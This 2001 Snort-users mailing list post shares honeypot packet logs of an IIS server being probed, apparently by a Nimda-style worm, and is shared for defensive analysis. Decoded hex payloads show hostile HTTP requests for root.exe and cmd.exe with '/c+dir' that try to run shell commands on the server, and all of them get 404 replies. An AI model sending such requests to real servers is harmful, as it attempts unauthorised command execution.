[Snort-users] Packet logs of Concept V.5 infection

Steve Halligan agent33 at ...187...
Tue Sep 18 09:13:04 EDT 2001


Here is a packet by packet replay of my honeypot getting infected.  I have
the admin.dll file if anyone wants to looks at it.
-Steve

----------------------------------------------------------------------------
--
#(2 - 24924) [2001-09-18 10:04:05]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=26648 flags=0 offset=0 TTL=118 chksum=60286
TCP:  port=4493 -> dport: 80  flags=******S* seq=406394821
      ack=0 off=6 res=0 win=8192 urp=0 chksum=34070
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25166) [2001-09-18 10:17:12]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=39313 flags=0 offset=0 TTL=118 chksum=47621
TCP:  port=3276 -> dport: 80  flags=******S* seq=460999518
      ack=0 off=6 res=0 win=8192 urp=0 chksum=21245
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25167) [2001-09-18 10:17:12]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=51456 flags=0 offset=0 TTL=128 chksum=32918
TCP:  port=80 -> dport: 3276  flags=***A**S* seq=285290
      ack=460999519 off=6 res=0 win=8760 urp=0 chksum=63045
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25168) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=22418 flags=0 offset=0 TTL=119 chksum=64264
TCP:  port=3276 -> dport: 80  flags=***A**** seq=460999519
      ack=285291 off=5 res=0 win=8760 urp=0 chksum=3587
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25169) [2001-09-18 10:17:13]  WEB-IIS CodeRed v2 root.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=112 ID=22674 flags=0 offset=0 TTL=119 chksum=63936
TCP:  port=3276 -> dport: 80  flags=***AP*** seq=460999519
      ack=285291 off=5 res=0 win=8760 urp=0 chksum=12511
Payload:  length = 72

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F   GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54   t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77   P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63   ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A                           lose....
----------------------------------------------------------------------------
--
#(2 - 25170) [2001-09-18 10:17:13]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=51712 flags=0 offset=0 TTL=128 chksum=32062
TCP:  port=80 -> dport: 3276  flags=***AP*** seq=285291
      ack=460999591 off=5 res=0 win=8688 urp=0 chksum=50754
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 33 20 47 4D 54 0D 0A 43    16:00:53 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25171) [2001-09-18 10:17:13]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=51968 flags=0 offset=0 TTL=128 chksum=32410
TCP:  port=80 -> dport: 3276  flags=***A***F seq=285895
      ack=460999591 off=5 res=0 win=8688 urp=0 chksum=2982
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25172) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=30354 flags=0 offset=0 TTL=118 chksum=56584
TCP:  port=3276 -> dport: 80  flags=*****R** seq=460999591
      ack=0 off=5 res=0 win=0 urp=0 chksum=35438
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25173) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=30610 flags=0 offset=0 TTL=118 chksum=56324
TCP:  port=3555 -> dport: 80  flags=******S* seq=461002231
      ack=0 off=6 res=0 win=8192 urp=0 chksum=18253
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25174) [2001-09-18 10:17:13]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=52224 flags=0 offset=0 TTL=128 chksum=32150
TCP:  port=80 -> dport: 3555  flags=***A**S* seq=285921
      ack=461002232 off=6 res=0 win=8760 urp=0 chksum=59422
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25175) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=30866 flags=0 offset=0 TTL=118 chksum=6921
TCP:  port=3276 -> dport: 80  flags=*****R** seq=460999591
      ack=460999591 off=5 res=0 win=0 urp=0 chksum=9037
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25176) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=39058 flags=0 offset=0 TTL=119 chksum=47624
TCP:  port=3555 -> dport: 80  flags=***A**** seq=461002232
      ack=285922 off=5 res=0 win=8760 urp=0 chksum=65499
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25177) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=110 ID=39314 flags=0 offset=0 TTL=119 chksum=47298
TCP:  port=3555 -> dport: 80  flags=***AP*** seq=461002232
      ack=285922 off=5 res=0 win=8760 urp=0 chksum=52401
Payload:  length = 70

000 : 47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E   GET /MSADC/root.
010 : 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F   exe?/c+dir HTTP/
020 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
030 : 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F   Connnection: clo
040 : 73 65 0D 0A 0D 0A                                 se....
----------------------------------------------------------------------------
--
#(2 - 25178) [2001-09-18 10:17:13]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=52736 flags=0 offset=0 TTL=128 chksum=31038
TCP:  port=80 -> dport: 3555  flags=***AP*** seq=285922
      ack=461002302 off=5 res=0 win=8690 urp=0 chksum=46875
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 34 20 47 4D 54 0D 0A 43    16:00:54 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25179) [2001-09-18 10:17:13]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=52992 flags=0 offset=0 TTL=128 chksum=31386
TCP:  port=80 -> dport: 3555  flags=***A***F seq=286526
      ack=461002302 off=5 res=0 win=8690 urp=0 chksum=64894
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25180) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=48018 flags=0 offset=0 TTL=118 chksum=38920
TCP:  port=3555 -> dport: 80  flags=*****R** seq=461002302
      ack=4011519 off=5 res=0 win=0 urp=0 chksum=18564
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25181) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=48274 flags=0 offset=0 TTL=118 chksum=38660
TCP:  port=3585 -> dport: 80  flags=******S* seq=461002481
      ack=0 off=6 res=0 win=8192 urp=0 chksum=17973
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25182) [2001-09-18 10:17:13]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=53248 flags=0 offset=0 TTL=128 chksum=31126
TCP:  port=80 -> dport: 3585  flags=***A**S* seq=286441
      ack=461002482 off=6 res=0 win=8760 urp=0 chksum=58622
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25183) [2001-09-18 10:17:13]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=48786 flags=0 offset=0 TTL=118 chksum=54536
TCP:  port=3555 -> dport: 80  flags=*****R** seq=461002302
      ack=461002302 off=5 res=0 win=0 urp=0 chksum=3336
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25184) [2001-09-18 10:17:14]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=62610 flags=0 offset=0 TTL=119 chksum=24072
TCP:  port=3585 -> dport: 80  flags=***A**** seq=461002482
      ack=286442 off=5 res=0 win=8760 urp=0 chksum=64699
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25185) [2001-09-18 10:17:14]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=120 ID=62866 flags=0 offset=0 TTL=119 chksum=23736
TCP:  port=3585 -> dport: 80  flags=***AP*** seq=461002482
      ack=286442 off=5 res=0 win=8760 urp=0 chksum=59489
Payload:  length = 80

000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73   GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
----------------------------------------------------------------------------
--
#(2 - 25186) [2001-09-18 10:17:14]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=53504 flags=0 offset=0 TTL=128 chksum=30270
TCP:  port=80 -> dport: 3585  flags=***AP*** seq=286442
      ack=461002562 off=5 res=0 win=8680 urp=0 chksum=46075
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 34 20 47 4D 54 0D 0A 43    16:00:54 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25187) [2001-09-18 10:17:14]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=53760 flags=0 offset=0 TTL=128 chksum=30618
TCP:  port=80 -> dport: 3585  flags=***A***F seq=287046
      ack=461002562 off=5 res=0 win=8680 urp=0 chksum=64094
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25188) [2001-09-18 10:17:14]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=51859 flags=0 offset=0 TTL=118 chksum=35075
TCP:  port=3785 -> dport: 80  flags=******S* seq=461004445
      ack=0 off=6 res=0 win=8192 urp=0 chksum=15809
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25189) [2001-09-18 10:17:14]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=54016 flags=0 offset=0 TTL=128 chksum=30358
TCP:  port=80 -> dport: 3785  flags=***A**S* seq=287413
      ack=461004446 off=6 res=0 win=8760 urp=0 chksum=55486
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25192) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=19860 flags=0 offset=0 TTL=119 chksum=1287
TCP:  port=3785 -> dport: 80  flags=***A**** seq=461004446
      ack=287414 off=5 res=0 win=8760 urp=0 chksum=61563
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25193) [2001-09-18 10:17:15]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=120 ID=20116 flags=0 offset=0 TTL=119 chksum=951
TCP:  port=3785 -> dport: 80  flags=***AP*** seq=461004446
      ack=287414 off=5 res=0 win=8760 urp=0 chksum=56352
Payload:  length = 80

000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
----------------------------------------------------------------------------
--
#(2 - 25194) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=644 ID=54528 flags=0 offset=0 TTL=128 chksum=29246
TCP:  port=80 -> dport: 3785  flags=***AP*** seq=287414
      ack=461004526 off=5 res=0 win=8680 urp=0 chksum=42683
Payload:  length = 604

000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A   HTTP/1.1 404 Obj
010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53   ect Not Found..S
020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74   erver: Microsoft
030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20   -IIS/4.0..Date: 
040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31   Tue, 18 Sep 2001
050 : 20 31 36 3A 30 30 3A 35 35 20 47 4D 54 0D 0A 43    16:00:55 GMT..C
060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34   ontent-Length: 4
070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65   61..Content-Type
080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C   : text/html....<
090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C
html><head><titl
0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74   e>Error
404</tit
0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D   le>....<meta
nam
0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65   e="robots"
conte
0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C
nt="noindex">..<
0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D   META HTTP-EQUIV=
0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43
"Content-Type" C
100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D
ONTENT="text/htm
110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38   l; charset=iso-8
120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A
859-1"></head>..
130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E
..<body>....<h2>
140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F   HTTP Error 404</
150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E
h2>....<p><stron
160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C   g>404 Not
Found<
170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65   <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68   r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74   e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20    you asked for. 
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65   Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74    URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20   hat the path is 
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63   <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61   t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20   dministrator if 
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72   this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25195) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=54784 flags=0 offset=0 TTL=128 chksum=29594
TCP:  port=80 -> dport: 3785  flags=***A***F seq=288018
      ack=461004526 off=5 res=0 win=8680 urp=0 chksum=60958
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25196) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=26260 flags=0 offset=0 TTL=118 chksum=60678
TCP:  port=3785 -> dport: 80  flags=*****R** seq=461004526
      ack=2073600184 off=5 res=0 win=0 urp=0 chksum=22745
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25197) [2001-09-18 10:17:15]  Honeypot Data
